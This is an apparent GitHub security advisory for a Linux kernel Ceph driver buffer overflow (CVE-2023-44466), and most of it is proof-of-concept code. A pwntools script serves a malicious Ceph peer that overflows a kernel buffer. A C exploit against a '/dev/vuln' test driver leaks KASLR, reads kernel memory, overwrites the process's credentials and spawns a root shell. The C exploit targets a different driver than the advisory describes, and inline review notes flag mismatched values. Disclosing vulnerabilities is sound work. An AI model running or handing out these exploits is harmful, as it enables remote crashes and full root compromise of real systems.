Skip to content

Linux Kernel: Ceph file system driver buffer overflow

Moderate
rcorrea35 published GHSA-jg27-jx6w-xwph Aug 30, 2023

Package

Kernel (Linux)

Affected versions

5.11

Patched versions

https://www.spinics.net/lists/ceph-devel/msg57909.html

Description

Summary

The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that results in a buffer overflow in the kernel: a user-controlled length is read from a TCP packet (see ceph_decode_32(&p) at this link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast to a signed integer (fd_lens has type int), which can yield a negative value that passes the validity checks on fd_lens.

This integer is then used to calculate the size of a buffer here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1698. The attacker can make head_len any value; for an overflow to happen, the attacker supplies a value smaller than the number of bytes that are copied here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1711. The copied data, con->v2.in_buf, is also user-controlled.

Severity

Moderate - An attacker who is able to identify the IP address of a device reading the Ceph file system can cause a denial of service and remote code execution in the kernel.

Proof of Concept

Create a linux kernel qemu VM following these steps: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md#image
Create two other disk images, compile the Linux kernel, and then run QEMU with the script below.
The bigdisk.img should be about 50GB and the other two at least 10GB each.

#!/bin/sh
# Boot the locally built kernel image under QEMU with 10G of RAM and 2 vCPUs.
# Three raw disk images are attached, guest port 22 is forwarded to
# 127.0.0.1:10021 on the host, the QEMU pid is written to vm.pid, and all
# console output is mirrored to vm.log.
# The kernel command line passes nokaslr and routes the console to ttyS0.
qemu-system-x86_64 \
        -m 10G \
        -smp 2 \
        -kernel linux-6.0.1/arch/x86/boot/bzImage \
        -nographic \
        -append "nokaslr console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
        -drive file=image/bigdisk.img,format=raw \
        -drive file=image/otherdisk.img,format=raw \
        -drive file=image/otherdisk2.img,format=raw \
        -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
        -net nic,model=e1000 \
        -pidfile vm.pid \
        -s \
        2>&1 | tee vm.log

Within the QEMU VM, install Ceph by following https://docs.ceph.com/en/latest/install/index_manual/ or by running the shell script below:

#!/bin/sh
# Minimal single-monitor Ceph setup inside the VM (monitor id: syzkaller).

# Install the Ceph packages (plus vim).
apt update -y && apt install -y vim ceph ceph-mds
# Append a [global] section to /etc/ceph/ceph.conf. These lines append, so
# re-running the script duplicates the entries.
echo '[global]' >> /etc/ceph/ceph.conf
echo 'fsid = 10229502-b892-4925-b21d-00de3c4973eb' >> /etc/ceph/ceph.conf
echo 'mon_initial_members = syzkaller' >> /etc/ceph/ceph.conf
# NOTE(review): mon_host uses 10.0.0.1 while monmaptool below registers the
# monitor at 10.0.2.15 - confirm which address is intended.
echo 'mon_host = [v2:10.0.0.1:3300/0,v1:10.0.0.1:6789/0]' >> /etc/ceph/ceph.conf
# Create the monitor, client.admin and bootstrap-osd keyrings.
ceph-authtool --create-keyring /tmp/ceph.mon.keyring --gen-key -n mon. --cap mon 'allow *'
ceph-authtool --create-keyring /etc/ceph/ceph.client.admin.keyring --gen-key -n client.admin --cap mon 'allow *' --cap osd 'allow *' --cap mds 'allow *' --cap mgr 'allow *'
ceph-authtool --create-keyring /var/lib/ceph/bootstrap-osd/ceph.keyring --gen-key -n client.bootstrap-osd --cap mon 'profile bootstrap-osd' --cap mgr 'allow r'
# Import the admin and bootstrap-osd keys into the monitor keyring and hand
# the keyring to the ceph user.
ceph-authtool /tmp/ceph.mon.keyring --import-keyring /etc/ceph/ceph.client.admin.keyring
ceph-authtool /tmp/ceph.mon.keyring --import-keyring /var/lib/ceph/bootstrap-osd/ceph.keyring
chown ceph:ceph /tmp/ceph.mon.keyring
# Build the monitor map using the same fsid as ceph.conf.
monmaptool --create --add syzkaller 10.0.2.15  --fsid 10229502-b892-4925-b21d-00de3c4973eb /tmp/monmap
# Create the monitor data directory, initialise it, and start the monitor.
sudo -u ceph mkdir /var/lib/ceph/mon/ceph-syzkaller
sudo -u ceph ceph-mon --mkfs -i syzkaller --monmap /tmp/monmap --keyring /tmp/ceph.mon.keyring
systemctl start ceph-mon@syzkaller
# Mount point used by the mount command later in this advisory.
mkdir -p /mnt/mycephfs

Executing this script locally to send the packet:

#!/usr/bin/python3
from pwn import *
from crc32c import crc32c
# Accept a single connection on TCP port 3300, exchange "ceph v2" banners,
# then send a hand-built 28-byte preamble followed by its checksum and a
# large payload.
l = listen(3300)
c = l.wait_for_connection()
# receive ceph banner
c.recv(8)
# receive sizeof(u64)+sizeof(u64)
print("length of features:", u16(c.recv(2)))
# receive features that are supported
print("features: ", u64(c.recv(8)), u64(c.recv(8)))
# send ceph banner
c.send(b'ceph v2\n')
# length of features
c.send(p16(16))
# https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1961
# features and required features
c.send(p64(1))
c.send(p64(1))
# https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L512
# fd_tag and fd_seg_cnt
preamble = p8(0) + p8(1)
# fd_lens and fd_aligns
# 2147483647+2147483647 casts to -2 and we want 37
# so head_len(size of buffer we can memcpy into)
# becomes 1 since head_onwire_len subtracts 36 bytes
# NOTE(review): the value packed below is 2147483647+2147483647-33
# (0xFFFFFFDD), which is -35 as a signed 32-bit integer; the "37" above does
# not obviously match - confirm the intended arithmetic.
preamble += p32(2147483647+2147483647-33) + p16(200)
# padding 20 bytes so it is 28 bytes
preamble += b'\x00'*20
assert(len(preamble)==28)
# The checksum printed here is informational only; the value actually sent
# after the preamble is the hard-coded constant below.
print("crc32c for preamble", crc32c(preamble))
c.send(preamble)
info("sending one kernel will compute: 2696580873")
# hash the kernel uses
c.send(p32(2696580873))
# 3,000,000 bytes of filler payload following the preamble checksum
c.send(b'A'*3000000)
print('sent')
c.interactive()

and then running this command within the VM, with the address of the device running the Python script,

mount -t ceph <ip address>:/ /mnt/mycephfs/ -o ms_mode=crc,name=foo

will result in a KASAN dump.

#define _GNU_SOURCE /* Bring REG_XXX names from /usr/include/sys/ucontext.h */
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include "leak.h"
#define DRV_PATH "/dev/vuln"
#define PWN_GET 28673
#define SE_PATH "/sys/fs/selinux/policy"
#define TASK_NAME "th3lsh3ll"
#define TASK_OFFSET 1112
#define NAME_OFFSET 1848
#define CRED_OFFSET 1824
#define CRED_SIZE 176
#define MMAP_ADDR 0xdead1000
// Request buffer handed to the driver through ioctl() (see alloc() and
// alloc_overflow()). The driver-side layout is not shown in this file.
struct in {
	int fd_len;               // 16 for the ordinary request (good), -20 for kleak
	int pad;                  // never written in this file
	unsigned long actual[2];  // never written in this file
	unsigned long size;       // byte count requested by arb_read()
	unsigned long addr;       // address requested by arb_read()
	unsigned long in_buf[8];  // never written in this file
};
void* page;
// Variant of struct in used for the write phase in main(): same leading
// fields, but the size/addr pair is replaced by next_alloc[2].
struct in_write {
	int fd_len;                   // set to -20 in main()
	int pad;                      // never written in this file
	unsigned long actual[2];      // never written in this file
	unsigned long next_alloc[2];  // main() writes only next_alloc[1]
	unsigned long in_buf[8];      // never written in this file
};

int drv_fd = 0;
int se_fd = 0;

// Report on stderr that the driver descriptor is unusable, printing the
// current errno text and the value of drv_fd.
void bad_fd() {
	fprintf(stderr, "%s invalid driver fd %d\n", strerror(errno), drv_fd);
}

struct in* good = NULL;
struct in* kleak = NULL;
struct in_write* kw = NULL;

unsigned long kaslr_offset = 0;
unsigned long kmalloc8 = 0;

// Issue a zero-length read() with a NULL buffer on the driver descriptor.
// Presumably the driver treats this as "release all allocations" (driver
// source is not part of this file - confirm). The read() result is ignored.
// If drv_fd is 0 the call is skipped and bad_fd() reports the problem.
void free_all() {
	if(drv_fd) {
		read(drv_fd, 0, 0);
	} else {
		bad_fd();
	}
}

// Send ioctl command 0 to the driver with the global `good` request.
// A failing ioctl is only logged; execution continues.
// If drv_fd is 0 the call is skipped and bad_fd() reports the problem.
void alloc() {
	if(drv_fd) {
		if(ioctl(drv_fd, 0, good)<0) {
			fprintf(stderr, "ioctl failed spraying kmalloc16\n");
		}
	} else {
		bad_fd();
	}
}

// Send the request `evil` to the driver.
//   evil     - request buffer (struct in or struct in_write) passed as-is
//   overflow - non-zero selects ioctl command PWN_GET, zero selects command 0
// A failing ioctl is only logged. The log text always mentions the KASLR
// leak, even when the call is made for another purpose.
// If drv_fd is 0 the call is skipped and bad_fd() reports the problem.
void alloc_overflow(void* evil, int overflow) {
	if(drv_fd) {
		int cmd = overflow ? PWN_GET : 0;
		if(ioctl(drv_fd, cmd, evil) < 0) {
			fprintf(stderr, "leaking KASLR ioctl failed\n");
		}
	} else {
		bad_fd();	
	}
}
 
// before triggering #DB exception make a SIGTRAP handler 
extern char mayfault_insn_pre[];
extern char mayfault_insn_post[];
// SIGTRAP handler installed by setup_kaslr_leak().
// If the saved RIP equals mayfault_insn_post the handler does nothing and
// returns. Otherwise it prints a diagnostic and restores the default SIGTRAP
// disposition.
// signum and info are unused.
// NOTE(review): the indentation is misleading - the signal() call below is
// inside the RIP-mismatch branch, not after it.
// NOTE(review): the comparison uses mayfault_insn_post but the message prints
// mayfault_insn_pre as the "expected" address - confirm which is intended.
void sigtrap_handler(int signum, siginfo_t *info, void *uctx_) {
	ucontext_t *uctx = uctx_;
	if(uctx->uc_mcontext.gregs[REG_RIP] != (unsigned long)mayfault_insn_post) {
		printf("fault at unknown RIP 0x%lx, expected 0x%lx\n", (unsigned long)uctx->uc_mcontext.gregs[REG_RIP], (unsigned long)mayfault_insn_pre);
	if(signal(SIGTRAP, SIG_DFL) == SIG_ERR) {
		fprintf(stderr, "signal failed %s\n", strerror(errno));
	}
   }
}

// Execute a single int1 instruction bracketed by the global assembler labels
// mayfault_insn_pre and mayfault_insn_post, so that sigtrap_handler() can
// compare the faulting RIP against a known address.
// Because the labels are global symbols, this function must be emitted only
// once (it must not be inlined or duplicated).
void trigger_DB() {
	asm volatile(
"mayfault_insn_pre:\n\t"
  "int1\n"
"mayfault_insn_post:\n\t"
);
}
// tell the scheduler to pin a task to a specific CPU core
// Restrict task `pid` to the single CPU `cpu` via sched_setaffinity().
// A failure is logged to stderr and otherwise ignored.
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  if(sched_setaffinity(pid, sizeof(cpu_set_t), &cset)) {
	fprintf(stderr, "sched_setaffinity %s\n", strerror(errno));
   }
}
// Pin the caller to `cpu` (pid 0 means the calling thread for sched_setaffinity).
static void pin_to(int cpu) { pin_task_to(0, cpu); }

// Open SE_PATH read-only into se_fd unless se_fd is already non-zero.
// NOTE(review): the open() result is not checked; on failure se_fd becomes -1,
// which later calls treat as an open descriptor.
void alloc_plm() { if(!se_fd) { se_fd = open(SE_PATH, O_RDONLY); } }
// Close se_fd unconditionally and reset it to 0 so alloc_plm() can reopen it.
void free_plm() { close(se_fd); se_fd = 0; }
int plm_hole = 32;

#define NUM_PRCTLS PAGE_SIZE
void * address[NUM_PRCTLS];

// Set (or, with name == NULL, clear) the name of the anonymous mapping
// [addr, addr+size) using prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, ...).
// Returns the prctl() result on success. On failure it logs the error and
// terminates the process with exit(1), so callers never see a negative value.
// NOTE(review): addr is a void* printed with %lx; an explicit cast would
// silence format warnings.
int rename_vma(void* addr, unsigned long size, char *name) {
    int res;
    res = prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, (unsigned long)addr, size, name);
    if (res < 0) {
        fprintf(stderr, "[!] prctl %s 0x%lx %ld\n", strerror(errno), addr, size);
   	exit(1);
    }
    return res;
}

// Create a 1024-byte private anonymous mapping, store it in address[idx], and
// name it through rename_vma(). The name is "aaaa" followed by idx+1 in
// decimal.
// snprintf() always NUL-terminates inside `store`, so the 12-byte `buf` is
// guaranteed to contain a terminator even though it is first filled with 'a'.
// NOTE(review): the mmap() result is not checked against MAP_FAILED, idx is
// not range-checked against NUM_PRCTLS, and idx (size_t) is formatted with %d.
void alloc_vmans(size_t idx) {
               address[idx] =
		mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 
        	char buf[12];
		memset(buf, 'a', 12);
        	char store[8];
        	memset(store, 'a', 8);
        	snprintf(store, 8, "%d", idx+1);
        	memcpy(&buf[4], store, 8);
        	rename_vma(address[idx], 1024, buf);
    }

// Undo alloc_vmans(idx): clear the mapping's name (NULL name), then unmap it.
// address[idx] is left holding the stale pointer.
void free_vmans(size_t idx) {
    rename_vma(address[idx], 1024, NULL);
    munmap(address[idx], 1024);
}

// Read `bytes` bytes that the driver exposes for address `addr`, by way of the
// se_fd descriptor.
// Steps: record addr/size in the global kleak request, rewind se_fd, call
// free_all(), submit kleak with the PWN_GET command, then read() from se_fd.
// Returns a heap buffer owned by the caller, or 0 if read() fails.
// NOTE(review): calloc(bytes, sizeof(unsigned long)) allocates 8x more than is
// read, and its result is not checked for NULL.
// NOTE(review): lseek() takes (fd, offset, whence); the arguments here are
// swapped. The call still rewinds to offset 0 only because SEEK_SET is 0.
// NOTE(review): the buffer is leaked on the error path, and a short read is
// not distinguished from a full one.
unsigned long* arb_read(unsigned long addr, unsigned long bytes) {
	unsigned long* leak = (unsigned long*)calloc((size_t)bytes, sizeof(unsigned long));
	kleak->addr = addr;
	kleak->size = bytes;
	lseek(se_fd, SEEK_SET, 0);
	free_all();
	alloc_overflow(kleak, 1);
	int nbytes = read(se_fd, leak, kleak->size);
	if(nbytes < 0) { 
		fprintf(stderr, "arb_read: error reading %s\n", strerror(errno));
		return 0;	
	}
	return leak;
}

// One-time preparation run at the start of main(): pin the process to CPU 0,
// install sigtrap_handler() for SIGTRAP, then execute trigger_DB().
// A sigaction() failure is logged but trigger_DB() still runs afterwards.
void setup_kaslr_leak() {
	// pin to cpu and set SIGTRAP handler so we can trigger DB exception
	pin_to(0);
	struct sigaction sigtrap_action = {
		.sa_sigaction = sigtrap_handler,
		.sa_flags = SA_SIGINFO
	};
	int ret = sigaction(SIGTRAP, &sigtrap_action, NULL);
	if(ret < 0) {
		fprintf(stderr, "sigaction failed %d %s\n", ret, strerror(errno));
	}
	// read kernel pointers
	trigger_DB();
}

// Compute the KASLR slide: read two pages starting at the fixed address
// 0xfffffe000000f000 with arb_read(), take the 8-byte value at offset 0x1f48,
// and subtract the reference value 0xffffffff81e0124d (presumably that
// pointer's address in a non-randomised build of the target kernel - confirm).
// Stores the result in the global kaslr_offset and also returns it.
// NOTE(review): arb_read() may return 0 and `ans` is dereferenced unchecked.
// NOTE(review): `!*first_leak` tests only the first byte of the leaked value.
// NOTE(review): a failed sanity check is only logged; the offset is still
// computed and returned. The buffer returned by arb_read() is never freed.
unsigned long kaslr_leak() {
	char* ans = (char*)arb_read(0xfffffe000000f000, PAGE_SIZE*2);
	// calculate KASLR offset	
	char* first_leak = ans+0x1f48;
	unsigned long kptr =(*(unsigned long*)first_leak); 
	if(!*first_leak || kptr < 0xffffffff81e0124d) {
		fprintf(stderr, "[!] either leak failed or KASLR disabled\n");
	}	
	kaslr_offset = kptr - 0xffffffff81e0124d;
	return kaslr_offset;
}

// Create 256 named anonymous mappings (slots 0..255 of address[]) and then
// release all of them again, in the same order.
void warm_heap() {
	puts("[*] warming heap");
	for(size_t i=0; i<256; i++) {
		alloc_vmans(i);
	}
	for(size_t i=0; i<256; i++) {
		free_vmans(i);
	}
}

// Program entry point. Visible sequence:
//   1. setup_kaslr_leak(), then name the process TASK_NAME via PR_SET_NAME.
//   2. Open the driver at DRV_PATH and build the `good` and `kleak` requests.
//   3. warm_heap(), a fixed alloc/free sequence, then alloc_plm().
//   4. kaslr_leak(), then walk the task list from init_task using arb_read()
//      until the entry named TASK_NAME is found; record its cred pointer.
//   5. Build the `kw` request and issue a series of alloc_overflow() calls,
//      stepping kw->next_alloc[1] down by 8 on each of five rounds.
//   6. If uid and euid are both 0, run /bin/sh.
//   7. fork(): the parent returns and the child sleeps forever, keeping the
//      inherited descriptors open.
// The order of the allocation and free calls is significant; do not reorder.
// NOTE(review): `char argc` is non-standard (should be int); argc and argv are
// unused.
int main(char argc, char** argv) {
	setup_kaslr_leak();
	// set process name so we can find it in task_struct linked list
	if(prctl(PR_SET_NAME, TASK_NAME, 0, 0, 0)) {
		fprintf(stderr, "prctl failed to set process name: %s\n", strerror(errno));
		return 1;
	}
	// ordinary request: fd_len 16, every other field zero (calloc)
	good = (struct in*)calloc(1, sizeof(struct in));
	good->fd_len = 16;
	// open driver
	drv_fd = open(DRV_PATH, O_RDWR);
	if(drv_fd < 0) {
		 fprintf(stderr, "%s driver device not available\n", strerror(errno));
		 return 1;
	}
	// leaking cred struct for current process task_struct by traversing task list starting
	// from init_task
	kleak = (struct in*)calloc(1, sizeof(struct in));
	// NOTE(review): `leak` is allocated here but never used or freed below.
	char* leak = (char*)calloc(PAGE_SIZE, sizeof(char));
	kleak->fd_len = -20;
	// placeholder value; stays unchanged if the task-list walk below fails
	unsigned long credptr = 0x42424242;
	// 8 bytes of task name plus a terminator so pname is always a C string
	char pname[9];
	pname[8] = 0;
	warm_heap();
	// make the SELinuxfs plm struct adjacent in memory to victim chunk
	// so we can overflow the size and address to copy to userspace
	alloc_vmans(1);
	alloc_vmans(0);
	free_vmans(0);
	alloc_overflow(good, 0);
	free_vmans(1);
	alloc_plm();
	kaslr_offset = kaslr_leak();
	printf("[*] KASLR offset 0x%lx\n", kaslr_offset);
	unsigned long init_task = 0xffffffff828149c0+kaslr_offset;
	unsigned long current = init_task;
	// NOTE(review): every arb_read() result in this loop is dereferenced
	// without a NULL check and is never freed.
	while(1) {
		// follow the list pointer stored at TASK_OFFSET to the next entry
		current = (*(arb_read(current+TASK_OFFSET, 8))) - TASK_OFFSET;
		// fetch the first 8 bytes of that entry's name
		*(unsigned long*)pname = (*(arb_read(current + NAME_OFFSET, 8)));	
		//printf("process name %s\n", pname);
		if(strchr(pname, '|')) {
			// regular SELinux reads as pipe if overflow fails to happen
			break;
		}
		if(!strncmp(TASK_NAME, pname, 8)) {
				printf("[*] 0x%lx current\n", current);
				unsigned long* addr = arb_read(current+CRED_OFFSET, 8);
				credptr = *addr;
				addr = arb_read(*addr, CRED_SIZE);
				printf("[*] current->real_cred: 0x%lx\n", credptr);
				hex_dump((char*)addr, CRED_SIZE);
				break;
		}
		// wrapped around to the list head without finding TASK_NAME
		if(init_task == current) {
			puts("failed");
			break;
		}
	}
	// NOTE(review): execution continues here even when the walk above broke
	// out without finding the task, leaving credptr at its placeholder value.
	alloc_vmans(0);
	alloc_vmans(1);
	free_vmans(0);
	free_vmans(1);
	
	kw = (struct in_write*)calloc(1, sizeof(struct in_write));
	kw->fd_len = -20;
	// start at fsid since it has 0x0s after it
	// once it gets overwritten with 0 do the next field with the same
	// freelist overwrite
	// key thing to remember is offset is size of heap chunk divided by 2
	// and last_chunk + offset
	kw->next_alloc[1] = credptr+32;
	
	alloc_overflow(kw, 1);
	for(size_t j=0; j<3; j++) {
		// allocate a chunk at the overwritten address
		// then write all zeroes to it
		alloc_overflow(good, 0);
	}
	// repeat for all the fields in the top of
	// the struct cred
	for(size_t i=0; i<5; i++) {
		warm_heap();
		alloc_vmans(0);
		alloc_vmans(1);
		free_vmans(0);
		free_vmans(1);
		// step the target down by one 8-byte slot per round
		kw->next_alloc[1] -= 8;	
		alloc_overflow(kw, 1);
		for(size_t j=0; j<3; j++) {
			alloc_overflow(good, 0);	
		}
	}
	if((getuid() == 0) && (geteuid() == 0)) {
		system("/bin/sh");
	} else {
		puts("[!] nooo failed\n");
	}
	// NOTE(review): a fork() failure (-1) is treated like the parent case.
	if (fork()) {
       		return 0;
   	} else {
       	//hold the fd for SELinuxFS file so the overwritten pointer is not freed
	//since this causes a kernel panic
       	while(1) { sleep(1000); }
   	}
	return 0;
}

CVE-2023-44466

Timeline

Date reported: 07/05/2023
Date fixed: 07/12/2023
Date disclosed: 08/30/2023

Severity

Moderate

CVE ID

CVE-2023-44466

Credits